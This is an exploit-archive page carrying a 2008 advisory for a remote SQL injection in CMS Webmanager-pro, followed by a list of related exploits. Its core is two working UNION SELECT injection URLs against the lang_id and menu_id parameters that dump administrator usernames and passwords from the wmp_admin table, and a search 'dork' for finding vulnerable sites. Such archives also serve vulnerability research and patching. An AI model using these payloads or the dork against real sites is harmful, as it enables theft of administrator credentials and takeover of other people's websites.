:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.eu ] ################################################################## # [ CMS Webmanager-pro ] Remote SQL Injection Vulnerability # ################################################################## # # Script site: http://webmanager-pro.com/ # # Vuln: # http://site.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/* # http://site.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/* # # Dork example: "CMS Webmanager-pro" # ############################################### # Greetz: D3m0n_DE * sid_psycho * and otherz.. ############################################### [ dun / 2008 ] ******************************************************************************************* # milw0rm.com [2008-05-18]
Related Exploits
Trying to match CVEs (1): CVE-2008-2351Trying to match OSVDBs (1): 45319
Other Possible E-DB Search Terms: CMS WebManager-Pro
Date | D | V | Title | Author |
---|---|---|---|---|
2010-10-30 |
![]() |
CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection | MustLive | |
2010-09-02 |
![]() |
CMS WebManager-Pro - 'c.php' SQL Injection | MustLive |